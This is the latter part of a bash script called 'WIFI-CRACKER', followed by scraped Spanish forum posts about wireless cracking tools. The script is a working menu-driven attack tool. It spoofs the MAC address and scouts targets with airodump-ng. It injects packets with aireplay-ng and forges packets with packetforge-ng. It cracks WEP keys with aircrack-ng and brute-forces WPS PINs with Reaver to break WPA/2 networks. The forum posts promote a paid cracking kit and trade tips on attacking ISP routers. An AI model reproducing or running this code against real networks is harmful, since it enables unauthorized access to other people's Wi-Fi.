echo "MESSAGE: Your desired MAC Address is       : ${MAC}"
local CONFIRM
read -p "Is this information corrent [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) MACINFO="ON" && break ;;
*) echo "MESSAGE: Please re-enter information"
esac
done
pause
macspoof_info
}
###########################################################################################
###########################################################################################
macspoof() {
show_logo
echo "############################################################################"
echo "############################SPOOFING MAC ADDRESS############################"
echo "##############################using macchanger##############################"
echo "############################################################################"
echo "MAC spoofing is in progress."
off_mon
echo "MAC spoofing is in progress..bringing wireless interface down"
ifconfig ${INTERFACE} down
echo "MAC spoofing is in progress...applying changes with macchanger"
macchanger ${MACOPTION} ${INTERFACE}
echo "MAC spoofing is in progress....bringing wireless back up"
ifconfig ${INTERFACE} up
echo "MAC spoofing is in progress.....DONE!"
MACMODE="ON"
pause
}
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! SCOUTING OPTION !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
scout_menu() {
while true
do
show_logo
echo "~~~~~~~~~~~~~~~~~~~~~~~~~"
echo " TARGET SCOUTING MENU"
echo "~~~~~~~~~~~~~~~~~~~~~~~~~"
echo "MESSAGE: WHILE SCOUTING REMEMBER YOUR TARGET'S BSSID, CHANNEL"
echo "MESSAGE: YOU WILL BE PROMPTED TO SAVE THIS INFO AFTER A SCOUTING SESSION"
echo "========================================================================"
echo "YOUR PRIMARY INTERFACE IS : ${INTERFACE} ; YOUR MONITOR INTERFACE IS : ${INTERFACE2}"
echo "========================================================================"
echo "Please choose an option"
echo "1.         Start scouting for WEP Targets"
echo "2.         Start scouting for ALL Targets"
echo "3.         Tell WIFI-CRACKER monitor mode status (STATUS: ${MONMODE})"
echo "4.         Turn ON monitor mode (STATUS: ${MONMODE})"
echo "5.         Turn OFF monitor mode (STATUS: ${MONMODE})"
echo "6.         Change you primary and monitoring interfaces' name"
echo "7. *MENU* Continue to the cracking menu"
echo "8. *MENU* Exit to main menu"
echo "9.         Exit WIFI-CRACKER"
local choice
read -p "Enter choice [ 1 - 9 ] " choice
case $choice in
1) scout_wep ;;
2) scout_all ;;
3) change_mon ;;
4) enable_mon ;;
5) off_mon ;;
6) ask_ifaces ;;
7) crack_menu ;;
8) main_menu ;;
9) f_exit ;;
"~") debug ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
#=========================================================================================#
change_mon() {
echo "Select 1. OFF or 2. ON for monitor interface mode (STATUS: ${MONMODE})"
local choice
read -p "Enter choice [ 1 - 2 ] " choice
case $choice in
1) MONMODE="OFF" ;;
2) MONMODE="ON" ;;
*) change_mon ;;
esac
}
###########################################################################################
enable_mon() {
show_logo
echo "############################################################################"
echo "###########################ENABLING MONITOR MODE############################"
echo "##############################using airomon-ng##############################"
echo "############################################################################"
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop ${INTERFACE2}
airmon-ng stop ${INTERFACE}
airmon-ng start ${INTERFACE}
MONMODE="ON"
}
###########################################################################################
off_mon() {
show_logo
echo "############################################################################"
echo "#########################TURNNING OFF MONITOR MODE##########################"
echo "##############################using airomon-ng##############################"
echo "############################################################################"
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop ${INTERFACE2}
airmon-ng stop ${INTERFACE}
MONMODE="OFF"
}
###########################################################################################
ask_ifaces() {
show_logo
echo "############################################################################"
echo "#########################CHANGING INTERFACES NAMES##########################"
echo "############################################################################"
echo "WHAT IS YOUR PRIMARY INTERFACE"
while true
do
read -p "WHAT IS YOUR PRIMARY INTERFACE ??" INTERFACE
read -p "WHAT IS YOUR MONITOR INTERFACE ??" INTERFACE2
echo "MESSAGE: Your primary interface is         : ${INTERFACE}"
echo "MESSAGE: Your desired MAC Address is       : ${INTERFACE2}"
local CONFIRM
read -p "Is this information correct [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) break ;;
*) echo "MESSAGE: Please re-enter information"
esac
done
pause
}
###########################################################################################
###########################################################################################
scout_wep() {
show_logo
echo "############################################################################"
echo "##########################SCOUTING FOR WEP TARGETS##########################"
echo "##############################using airodump###############################"
echo "############################################################################"
pre_crack
echo "MESSAGE: use CTRL+C to exit airodump once you've picked a target and took all"
echo "   the info you need."
pause
airodump-ng --encrypt WEP ${INTERFACE2}
local CONFIRM
read -p "MESSAGE: WOULD YOU LIKE TO WRITE DOWN YOUR TARGET'S INFO NOW [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) change_target ;;
*) echo -e "${RED}MESSAGE: YOUR CHOICE, BACK TO MENU...${STD}" && sleep 2;;
esac
}
###########################################################################################
###########################################################################################
scout_all() {
show_logo
echo "############################################################################"
echo "############################SCOUTING FOR TARGETS############################"
echo "##############################using airodump###############################"
echo "############################################################################"
pre_crack
echo "MESSAGE: use CTRL+C to exit airodump once you've picked a target and took all"
echo "   the info you need."
pause
airodump-ng ${INTERFACE2}
local CONFIRM
read -p "MESSAGE: WOULD YOU LIKE TO WRITE DOWN YOUR TARGET'S INFO NOW [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) change_target ;;
*) echo -e "${RED}MESSAGE: YOUR CHOICE, BACK TO MENU...${STD}" && sleep 2;;
esac
}
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! CRACKING OPTION !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
crack_menu() {
while true
do
show_logo
echo "~~~~~~~~~~~~~~~~~~~~~~~"
echo " CRACKING WIFI MENU"
echo "~~~~~~~~~~~~~~~~~~~~~~~"
echo "========================================================================"
echo "YOUR PRIMARY INTERFACE IS : ${INTERFACE} ; YOUR MONITOR INTERFACE IS : ${INTERFACE2}"
echo "SAVE FILENAME : ${FILE} YOUR CURRENT MAC IS : ${CMAC}"
echo "========================================================================"
echo "TARGET BSSID : ${BSSID} TARGET CHANNEL : ${CHANNEL}"
echo "TARGET ESSID : ${ESSID} CURRENTLY CRACKED WIFI KEY : ${KEY}"
echo "========================================================================"
echo "Please choose an option"
echo " Have you changed your MAC yet? (STATUS: ${MACMODE})"
echo " 1. *MENU* Visit Mac spoofing menu"
echo " Haven't selected a target yet?"
echo " 2. *MENU* Visit Target scouting menu"
echo " 3.        Changer your target's information"
echo " 4. WEP - Passive crack (No package generation)"
echo " 5. WEP - Active crack (might make AP unusable while attacking)"
echo " 6. WEP - Active crack with Fragmentation attack"
echo " 7. WEP - Crack a previously saved session of airodump (METHOD 1)"
echo " 8. WEP - Crack a previously saved session of airodump (METHOD 2)"
echo " 9.        Use aircrack-ng (any command you want)"        
echo "10. WPA - Crack WPA/2(if enabled WPS) with Reaver"
echo "11. WPA - Continue previous Reaver session *NEW*"
echo "12.        Change you primary and monitoring interfaces' name"
echo "13.        Tell WIFI-CRACKER monitor mode status (STATUS: ${MONMODE})"
echo "14.        Turn ON monitor mode (STATUS: ${MONMODE})"
echo "15.        Turn OFF monitor mode (STATUS: ${MONMODE})"
echo "16. *MENU* Exit to main menu"
echo "17.        Exit WIFI-CRACKER"
local choice
read -p "Enter choice [ 1 - 17 ] " choice
case $choice in
1) macspoof_info ;;
2) scout_menu ;;
3) change_target && pause ;;
4) passive_wepcrack ;;
5) wepcrack ;;
6) wepcrack2_frag ;;
7) wepfile_crack ;;
8) wepfile_crack2 ;;
9) aircrack ;;
10) wpacrack ;;
11) wpacrack_continue ;;
12) ask_ifaces ;;
13) change_mon ;;
14) enable_mon ;;
15) off_mon ;;
16) main_menu ;;
17) f_exit ;;
"~") debug ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
###########################################################################################
change_target() {
while true
do
echo ""
echo ""
echo "############################################################################"
echo "########################CHANGING TARGET INFORMATION#########################"
echo "############################################################################"
read -p "WHAT IS YOUR TARGET'S BSSID (ITS MAC ADDRESS)?? " BSSID
read -p "WHAT IS YOUR TARGET'S CHANNEL ?? " CHANNEL
read -p "WHAT IS YOUR TARGET'S ESSID (THE NAME YOU SEE) ?? " ESSID
read -p "WHAT IS YOUR DESIRED FILENAME FOR AIRODUMP SESSION ?? " FILE
echo "MESSAGE: Your target's BSSID                       : ${BSSID}"
echo "MESSAGE: Your target's channel                     : ${CHANNEL}"
echo "MESSAGE: Your target's ESSID                       : ${ESSID}"
echo "MESSAGE: Your airodump session file name is : ${FILE}"
local CONFIRM
read -p "Is this information corrent [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) break ;;
*) echo "MESSAGE: Please re-enter information"
esac
done
sleep 2
}
###########################################################################################
pre_crack() {
show_logo
echo ""
echo "checking mac address spoof......"
while true
do
case ${MACMODE} in
"ON") echo "MAC MODE IS ALREADY SPOOFED!" && sleep 2 && break ;;
"OFF") macspoof && break;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear ;;
esac
done
echo "checking mac address spoof......DONE!"
echo ""
echo "checking monitor mode......"
while true
do
case ${MONMODE} in
"ON") echo "MONITOR MODE IS ALREADY ON!" && sleep 2 && break ;;
"OFF") enable_mon && break ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear ;;
esac
done
echo "checking monitor mode......DONE!"
sleep 3
}
###########################################################################################
start_wepcrack() {
pre_crack
show_logo
echo "############################################################################"
echo "############################### CRACKING WEP ###############################"
echo "###########################using aircrack suite############################"
echo "############################################################################"
echo ""
echo "MESSAGE: YOU NEED AT LEAST 50000 DATA PACKETS FOR AIRCRACK TO WORK!"
pause
}
###########################################################################################
passive_wepcrack() {
start_wepcrack
echo "STEP 1 : START AIRODUMP IN NEW WINDOW"
sleep 5
${TERMINAL} -e "airodump-ng -c ${CHANNEL} -w ${FILE} --bssid ${BSSID} ${INTERFACE}" & AIRODUMPPID=$!
echo "STEP 2 : WAIT A VERY LONG TIME"
sleep 5
echo "MESSAGE: CONTINUE ONLY WHEN #DATA > 50000"
pause
echo "STEP 3 : CRACK FILE"
sleep 30
wepfile_crack
echo "killing processes..."
kill ${AIRODUMPPID}
echo "killing processes...DONE!"
pause
clean_up
}
###########################################################################################
wepcrack() {
start_wepcrack
echo "STEP 1 : START AIRODUMP IN NEW WINDOW"
sleep 5
${TERMINAL} -e "airodump-ng -c ${CHANNEL} -w ${FILE} --bssid ${BSSID} ${INTERFACE}" & AIRODUMPPID=$!
echo "STEP 2 : FAKE AUTH"
sleep 5
aireplay-ng -1 0 -a ${BSSID} -h ${CMAC} -e ${ESSID} ${INTERFACE2}
echo "STEP 3 : GENERATE PACKETS"
sleep 2
${TERMINAL} -e "aireplay-ng -3 -b ${BSSID} -h ${CMAC} ${INTERFACE2}" & AIREPLAYPID=$!
echo "STEP 4 : WAIT A LITTLE BIT"
echo "MESSAGE: CONTINUE ONLY WHEN #DATA > 50000"
pause
echo "STEP 5 : CRACK FILE"
sleep 30
wepfile_crack
echo "killing processes..."
kill ${AIRODUMPPID} && kill ${AIREPLAYPID}
echo "killing processes...DONE!"
pause
clean_up
}
###########################################################################################
wepcrack2_frag() {
start_wepcrack
echo "STEP 1 : START AIRODUMP IN NEW WINDOW"
sleep 5
${TERMINAL} -e "airodump-ng -c ${CHANNEL} --bssid ${BSSID} --ivs -w capture ${INTERFACE}" & AIRODUMPPID=$!
sleep 2
echo "STEP 2 : ASSOCIATE THEN FRAGMETATIONG ATTACK"
sleep 5
aireplay-ng -1 0 -a ${BSSID} -h ${CMAC} ${INTERFACE2}
aireplay-ng -5 -b ${BSSID} -h ${CMAC} ${INTERFACE2}
packetforge-ng -0 -a ${BSSID} -h ${CMAC} -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet ${INTERFACE2}
${TERMINAL} -e "aireplay-ng -2 -r arp-packet ${INTERFACE2}" & AIREPLAYPID=$!
echo "STEP 3 : WAIT"
sleep 5
echo "MESSAGE: CONTINUE ONLY WHEN #DATA > 50000"
pause
echo "STEP 5 : CRACK FILE"
sleep 30
wepfile_crack2
echo "killing processes..."
kill ${AIRODUMPPID} && kill ${AIREPLAYPID}
echo "killing processes...DONE!"
sleep 5
clean_up
}
###########################################################################################
wepfile_crack() {
show_logo
echo "############################################################################"
echo "###############################CRACKING FILE################################"
echo "##############################using aircrack###############################"
echo "############################################################################"
echo ""
while true
do
echo "MESSAGE: YOUR CURRENT FILE NAME IS : ${FILE}"
local CONFIRM
read -p "Would you like to change that?? [Y/n] " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) echo "" & read -p "What is the file name (without -01.cap) ?? " FILE & break ;;
*) echo "MESSAGE: ALRIGHT, CONTINUING...."
esac
done
echo "MESSAGE: STARTING UP AIRCRACK TO RETRIEVE KEY FROM FILE"
echo "MESSAGE: DEPENDING ON HOW MUCH PACKETS YOU'VE CAPTURED THIS COULD TAKE SOME TIME"
pause
while true
do
aircrack-ng -b ${BSSID} ${FILE}*.cap
read -p "Did aircrack-ng find the key [Y/n/cancel]" CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes|cancel|CANCEL|c|C) break ;;
*) echo "MESSAGE: ATTEMPTING TO CRACK AGAIN" & pause
esac
done
echo "MESSAGE: DROP ALL THE ":" AND USE THE KEY AS PASSWORD TO CONNECT"
store_key
pause
}
###########################################################################################
wepfile_crack2() {
show_logo
echo "############################################################################"
echo "##########################CRACKING FILE (METHOD 2)##########################"
echo "##############################using aircrack###############################"
echo "############################################################################"
echo "MESSAGE: STARTING UP AIRCRACK TO RETRIEVE KEY FROM FILE"
echo "THE FILE IS ANY .ivs THAT MATCHES YOUR CURRENT TARGET BSSID"
echo "MESSAGE: DEPENDING ON HOW MUCH PACKETS YOU'VE CAPTURED THIS COULD TAKE SOME TIME"
pause
while true
do
aircrack-ng -n 128 -b ${BSSID} *.ivs
read -p "Did aircrack-ng find the key [Y/n/cancel]" CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes|cancel|CANCEL|c|C) break ;;
*) echo "MESSAGE: ATTEMPTING TO CRACK AGAIN" & pause
esac
done
echo "MESSAGE: DROP ALL THE ":" AND USE THE KEY AS PASSWORD TO CONNECT"
store_key
pause
}
###########################################################################################
wpacrack() {
pre_crack
show_logo
echo "############################################################################"
echo "######################CRACKING WPA/2 PROTECTED NETWORK######################"
echo "################################using reaver################################"
echo "############################################################################"
echo "MESSAGE: BE SURE THAT YOU'VE ADDED THE TARGET INFORMATION FOR A WPA/2 AP"
echo "MESSAGE: NOW LAUNCHING REAVER TO CRACK WPA/2. THIS CAN TAKE FROM 4 TO 10 HOURS"
echo "MESSAGE: SIGNAL MUST BE STRONG FOR REAVER TO WORK PROPERLY!!!"
pause
reaver -i ${INTERFACE2} -b ${BSSID} -c ${CHANNEL} -e ${ESSID} -a -vv
store_key
pause
}
###########################################################################################
wpacrack_continue() {
pre_crack
while true
do
show_logo
echo "############################################################################"
echo "######################CRACKING WPA/2 PROTECTED NETWORK######################"
echo "################using reaver with a previously saved session################"
echo "############################################################################"
echo "MESSAGE: BE SURE THAT YOU'VE ADDED THE TARGET INFORMATION FOR A WPA/2 AP"
echo "MESSAGE: NOW LAUNCHING REAVER TO CRACK WPA/2. THIS CAN TAKE FROM 4 TO 10 HOURS"
echo "MESSAGE: SIGNAL MUST BE STRONG FOR REAVER TO WORK PROPERLY!!!"
pause
local SESSION
read -p "What is the name of your previously saved session (a {BUNCH OF NUMBERS HERE}.wpc file)?? " SESSION
case $SESSION in
"") echo -e "${RED}MESSAGE: ERROR, TRY AGAIN...${STD}" && sleep 2 && clear ;;
*) echo "MESSAGE: ALRIGHT, CONTINUING PREVIOUS REAVER SESSION...." && sleep 3 && break
esac
done
reaver -s ${SESSION}
store_key
pause
}
###########################################################################################
store_key() {
local CONFIRM
read -p "Would you like to write down your key [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) echo "" &&
echo "" &&
echo "############################################################################" &&
echo "##############################SAVING WIFI KEY###############################" &&
echo "############################################################################" &&
read -p "WHAT IS THE WIFI KEY?? " KEY &&
echo "MESSAGE: The key for the WIFI YOU CRACKED IS: ${KEY}" ;;
*) echo -e "${RED}MESSAGE: YOUR CHOICE, BACK TO MENU...${STD}" && sleep 5;;
esac
}
###########################################################################################
aircrack() {
pre_crack
show_logo
echo "############################################################################"
echo "###################USE PERSONNAL COMMANDS FOR AIRCRACK-NG###################"
echo "###############################using aircrack###############################"
echo "############################################################################"
local COMMAND
read -p "What command would you like to use in aircrack-ng?? " COMMAND
echo "MESSAGE: OPENING AIRCRACK-NG IN A NEW WINDOW"
${TERMINAL} -e "aircrack-ng ${COMMAND}" & sleep 5 & pause & crack_menu
}
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! PACKET SNIFFING OPTIONS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
sniff_menu() {
while true
do
show_logo
echo "############################################################################"
echo "############################PACKET SNIFFING MENU############################"
echo "#########################using tshark and wireshark#########################"
echo "############################################################################"
echo "~~~~~~~~~~~~~~~~~~~~~~~~~"
echo " PACKET SNIFFING MENU"
echo "~~~~~~~~~~~~~~~~~~~~~~~~~"
echo "========================================================================"
echo "YOUR PRIMARY INTERFACE IS : ${INTERFACE} ; YOUR MONITOR INTERFACE IS : ${INTERFACE2}"
echo "SAVE FILENAME : ${FILE2} "
echo "========================================================================"
echo "Please choose an option"
echo " Have you changed your MAC yet? (STATUS: ${MACMODE})"
echo " 1. *MENU* Visit Mac spoofing menu"
echo " 2.        Run tshark (on ${INTERFACE2})"
echo " 3.        Run tshark and write to file"
echo " 4.        Use tshark with any command"
echo " 5.        Run wireshark (THE GREAT GUI VERSION OF TSHARK)"
echo " 6.        Change you primary and monitoring interfaces' name"
echo " 7.        Tell WIFI-CRACKER monitor mode status (STATUS: ${MONMODE})"
echo " 8.        Turn ON monitor mode (STATUS: ${MONMODE})"
echo " 9.        Turn OFF monitor mode (STATUS: ${MONMODE})"
echo "10. *MENU* Exit to main menu"
echo "11.        Exit WIFI-CRACKER"
local choice
read -p "Enter choice [ 1 - 11 ] " choice
case $choice in
1) macspoof_info ;;
2) pre_crack && tshark -i ${INTERFACE2} && pause ;;
3) pre_crack && tshark -i ${INTERFACE2} -w ${FILE2} && pause ;;
4) tshark_any ;;
5) wireshark & disown && pause ;;
6) ask_ifaces ;;
7) change_mon ;;
8) enable_mon ;;
9) off_mon ;;
10) main_menu ;;
11) f_exit ;;
"~") debug ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
###########################################################################################
tshark_any() {
pre_crack
show_logo
echo "############################################################################"
echo "#####################USE PERSONNAL COMMANDS FOR TSHARK######################"
echo "################################using tshark################################"
echo "############################################################################"
local COMMAND
read -p "What command would you like to use in tshark?? " COMMAND
echo "MESSAGE: OPENING TSHARK IN A NEW WINDOW"
${TERMINAL} -e "tshark ${COMMAND}" & pause
}
#+++++++++++++++++++++++++++++++++++++ MAIN FUNCTION +++++++++++++++++++++++++++++++++++++#
start_up


FUENTE: http://xiaopan.co/forums/threads/wifi-cracker-v1-2-2-download-source-bash-script.1879/
#486
Wireless en Linux / WEPWPA 1.5 + Reaver 1.4 [Info]
11 Noviembre 2012, 04:20 AM
Incluidos:
• Rainbow table Generator
• 10 Digit Phone number wordlist generator
• WPA Cracker
• WEP Cracker
• WPS Cracker


Este software tiene incluso la posibilidad de un ataque de fuerza bruta WPA en caso que su lista de palabras no acelerar el juego.

Consíguelo aquí: http://shop.top-hat-sec.com/Members-Only-Software_c5.htm

Es un poco preocupante sin embargo. El sitio web parece que están realmente detrás del dinero, en lugar de desarrollar una comunidad. n1tr0g3n que se sugiere: http://www.n1tr0g3n.com/?p=1932 dice que lo compró y "es la mejor galleta wifi hasta ahora" tiene enlaces del menú a la tienda de sombrero de copa-sec.com y un foro para que apesta un poco. Él debe tener un descargo de responsabilidad completo.


En primer lugar, no es sólo para los miembros que cuesta un mínimo de $ 6.99 al año: http://shop.top-hat-sec.com/Memberships_c2.htm Aunque usted puede comprar sin una membresía, usted recibirá reembolso porque no lo hace tienen una membresía.

En segundo lugar, es mejor obtener el curso WEPWAP que es de $ 19.99, y si desea que el vídeo en DVD, usted tiene que pagar el envío también. WEPWAP sólo software (sin instrucciones de cómo usarlo) en sus propios costes $ 9,99.

Por lo tanto, ser transparentes acerca de los costos y lo que obtienes .... desnudo mínimo, tendrá que pagar $ 6.99 + $ 9.99

WepWap1.5 instrucciones para su correcta instalación

El programa consta de WepWap1-5.tar.gz, WepWapsetup1-5.sh y WepWap1 5.txt-Asegúrese de descargar los 3 WepWap1-5 archivos y colocarlos en el escritorio. Así que usted pulse Guardar y cambiar la ubicación de la raíz a Desktop. No extraiga. No haga ninguna carpeta que el programa está diseñado para hacerlo todo por usted. Sólo tiene que abrir el archivo Readme.txt y siga las instrucciones y se establecerá!

Tenga en cuenta que cuando el programa intenta descifrar las claves inalámbricas de punto de acceso, se guardará una copia de la grieta y decir "la clave ha sido guardado" independientemente de que la grieta se ha realizado correctamente. En la terminal, el programa mostrará si fue o no exitosa.

Hemos añadido una nueva función para el Programa WepWap y se movió un par de cosas a su alrededor. WepWap1-5 viene con Reaver. Reaver no es nuestro programa y tiene un montón de errores. A veces funciona ya veces no. Cuando funciona, funciona genial! Hay algunas secciones del foro sobre Reaver. La mayoría de las veces, el problema viene cuando no sea lo suficientemente cerca del punto de acceso o demasiado cerca (sentada junto a él). La funcionalidad de Reaver también depende del tipo de tarjeta inalámbrica que tiene. Lamentablemente, no tenemos control sobre esto.

Si tiene Backtrack 5 R2 o posterior de lo que ya viene con Reaver. Si usted no tiene Reaver, que estará en la carpeta WepWap1-5 después de haber seguido las instrucciones y sólo tendrá que instalarlo.

Por favor, tenga en cuenta:
El programa WepWap1-5 sólo se ejecutarán en Backtrack KDE / Gnome de 32 bits. No va a funcionar en 64 bits.

Renuncia:
* WepWpa, WpaPy y WePpy son todos los programas registrados de Top-Hat-Sec. Al descargar cualquiera de estos programas, usted está de acuerdo que usted no podrá copiar o distribuir todo o parte del programa (s) sin la autorización previa de los fundadores del Top-Hat-Sec. Usted es libre de guardar una copia de seguridad del programa (s) para su uso personal.
#487
Cita de: pepehabana en  7 Noviembre 2012, 10:26 AM
1.- Hola a todos la Alfa network adaptador wifi usb realtek rtl8187L es compatible???
2.- Si una red nos da el wps 0x02 es 100% hackeable ???

Saludos...

1.- Si.
2.- No.

Cita de: Rumberto en  8 Noviembre 2012, 21:28 PM
Hola a todos, llevo un día intentando sacar una pass y me gustaría que me dijeseis un par de cosas :

- Hace unos minutos se ha cumplido 24 horas desde que he empezado a utilizar reaver con una red de ONOXXXX cuya MAC empieza por 00:21:B7.... , va por el 16% a una media de 52 pin/sec y he leido por aquí que a la gente le tarda bastante menos, no tiene que llegar al 100% a este ritmo verdad? Me refiero a que si encuentra el pin en el 20% por ejemplo ya termina, no?

- En caso de pausar el proceso, hay que guardarlo obligatoriamente ? O si me fijo en el ultimo pin que ha probado y empiezo otro ataque desde ese mismo continua ahí?

Yo tarde 30 Días con un Thomson, vas bien!
#488
Cita de: Carpena en  5 Noviembre 2012, 22:14 PM
Pues uso una tarjeta alfa de 1w con el chipset rtl8187L ,confirmado..
Todavia no he usado el wash pero he seguido los pasos para saber si esta activado en base al video de manejo de reaver que sale en la pagina de wifiway, que basicamente se trata de hacer una captura y analizarla con el wireshark y tiene que poner en una parte 0x02 y si que me sale 0x02 igual que en la otra que si consegi obtener, si quereis mas detalles mañana arranco otra vez y ejecuto el walsh y os paso el video

otra cosa eso que se comenta sobre:es cierto???
http://ubuntuadicto.blogspot.com.es/2009/04/buena-noticia-airdecloak-ng-tkiptun-ng.html

saca una WPA de 64 caracteres en 15 minutos.
#489
Wireless en Linux / Re: problemas con reaver
5 Noviembre 2012, 01:16 AM
Principalmente el reaver 10.4 no existe, si se queda colgado pueda que sea problema del driver y/o de la calidad de señal que tengas. Cambia de version y verifica tu Chipset que sea compatible, hay un hilo especializado para esto http://foro.elhacker.net/wireless_en_linux/reaver_vulnerabilidad_de_wpa_por_wps_habilitado-t350507.0.html.
#490
No cambiara en nada por mas que le pongas una antena de 2222dBi.. todo depende tanto de tu lado como del lado del router y/o equipamiento del otro extremo para que se vean.